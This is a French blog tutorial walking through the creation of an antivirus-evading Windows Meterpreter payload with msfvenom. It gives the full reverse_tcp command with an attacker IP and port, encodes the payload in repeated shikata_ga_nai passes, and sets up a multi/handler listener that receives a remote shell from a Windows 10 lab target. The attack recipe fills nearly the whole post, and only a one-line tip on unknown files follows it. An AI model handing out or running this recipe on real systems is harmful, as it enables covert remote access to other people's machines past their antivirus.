Création de payloads indétectable avec Metasploit.

By | 8 mai 2020
𝗩𝗼𝘁𝗿𝗲 𝘁𝗲𝗺𝗽𝘀 𝗱𝗲 𝗹𝗲𝗰𝘁𝘂𝗿𝗲: 4 minutes
Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Un appareil sans antivirus est un appareil exposé aux dangers de l’Internet“.

Ceci est la fameuse phrase qu’utilise la majorité de personnes qui n’en savent pas beaucoup au sujet de la sécurité des systèmes d’informations.Bon je ne les en veux pas tout de même car il faudra quand même valider cette phrase.L’antivirus est aussi un outil très important car il permet de participer à la sécurité des appareils.

Dans ce petit tutoriel,nous allons voir comment il est possible de gagner l’accès à une machine équipée d’un système d’exploitation Windows 10 qui possède un antivirus mis à jour.

Création de payloads indétectable avec Metasploit

Lab:

Kali (Machine attaquante )

Windows 10 (Machine cible avec antivirus mis à jour)

Nous allons simplement ouvrir un terminal sur la machine attaquant et nous allons commencer par utiliser l’outil msfvenom qui va nous permettre de créer notre payload après que nous aillons pris toutes les informations nécessaire sur la machine cible.

Dans le terminal de la machine attaquante,il nous suffira de taper la commande suivante après que nous nous sommes placer sur notre bureau:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.26 LPORT= 4444 -b ‘\x00\xff ‘ -e x86/shikata_ga_nai -i 10 -f exe > payload.exe

Voici quelques petites explications des options ci-dessous:

-p c’est le type de payload qu’on utilise.

LHOST c’est l’adresse IP de la machine attaquante( La machine doit se connecter à notre machine)

LPORT c’est le port qu’on choisie sur la machine attaquante

-b c’est le type de caractères à éviter.

-e c’est l’encodeur.

-i le nombre d’itérations (c’est important à augmenter si possible)

-f c’est le format de sortie

Pour finir notre fichier infecté s’appelle payload.exe

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

La figure ci-dessus montre bel et bien que le fichier a été crée et si nous souhaitons le vérifier,il nous suffira de taper la commande ls pour lister les éléments présent sur le bureau:

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Maintenant que notre fichier est crée,nous allons ouvrir un autre terminal et nous allons d’abord taper les commandes suivantes: msfupdate ; msfdb init pour faire mise à jour s’il existe et nous allons initialiser la base de données de l’outil metasploit.

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Si tout se passe bien,nous allons maintenant taper la commande:msfconsole pour lancer notre outil metasploit.

Nous allons lancer le listener en utilisant l’exploit multi/handler et nous allons aussi ajouter l’adresse IP de la machine attaquante et le port d’écoute comme le montre la figure ci-dessous:

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Lorsque nous aurons fini,il nous suffira de d’appuyer sur la touche Entrée de notre clavier pour lancer l’écoute et nous aurons le résultat suivant:

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Lorsque la machine cible exécutera le fichier infecté ci-dessous:

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Nous aurons le résultat suivant du côté de la machine attaquante:

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Nous venons d’obtenir une session meterpreter et si nous tapons la commande sysinfo nous aurons ceci:

Création de payloads indétectable avec 'Metasploit'.
Création de payloads indétectable avec ‘Metasploit’.

Nous avons bel et bien l’accès à notre machine cible Windows 10 avec bien évidement un antivirus mise à jour récemment.

Pour résumer nous avons vu comment il était de gagner l’accès à une machine malgré le fait que son antivirus soit mise à jour.Pour ne jamais tomber dans ce genre piège,il ne faut jamais exécuter un fichier dont on ignore la provenance.Pensez toujours à télécharger des fichiers sur le site web de l’éditeur.

N’oubliez pas de me contacter si jamais vous avez des questions allant dans le sens de notre tutoriel.

A très bientôt les amis pour un nouvel article.Mekang!

🙂

5 1 vote
Évaluation de l'article
"RESSONOA.COM"

Passionné de cryptographie,de sécurité informatique, de mathématiques en gros des nouvelles technologies de l’information et de la communication. J’♥️ aussi le graphisme.Le partage est pour moi le véritable moyen de pouvoir vivre de sa vraie passion.Vous pouvez me contacter de différentes manières:Contact,Facebook,Twitter,Instagram,Pinterest.

S’abonner
Notifier de
guest

3 Commentaires
Le plus ancien
Les plus récents Les plus votés
Feedback en ligne
Voir tous les commentaires
herman
herman
2 années il y a

Merci beaucoup pour l’article. Comment puisse-je vous contacter ?